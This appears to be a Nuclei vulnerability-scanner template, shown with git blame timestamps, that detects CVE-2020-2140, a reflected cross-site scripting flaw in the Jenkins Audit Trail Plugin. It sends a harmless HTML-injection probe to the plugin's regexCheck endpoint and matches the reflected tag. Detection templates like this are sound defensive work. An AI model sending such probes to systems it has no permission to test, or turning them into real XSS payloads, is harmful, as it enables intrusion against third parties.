nuclei-templates/cves/2020/CVE-2020-2140.yaml

35 lines
1.0 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-2140
2020-08-30 17:42:46 +00:00
info:
author: j3ssie/geraldino2
name: Jenkin Audit Trail Plugin XSS
2020-08-30 17:42:46 +00:00
severity: medium
2020-08-31 07:38:04 +00:00
description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
reference: https://www.jenkins.io/security/advisory/2020-03-09/
tags: cve,cve2020,jenkins,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-2140
cwe-id: CWE-79
2020-08-31 07:38:04 +00:00
2020-08-30 17:42:46 +00:00
requests:
2020-08-31 07:38:04 +00:00
- method: GET
path:
- "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
- "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
2020-08-31 07:38:04 +00:00
matchers-condition: and
matchers:
- type: word
2020-08-30 17:42:46 +00:00
words:
- <h1>sample
2020-08-31 07:38:04 +00:00
part: body
- type: word
words:
- "text/html"
part: header
2020-08-31 07:38:04 +00:00
- type: status
status:
- 200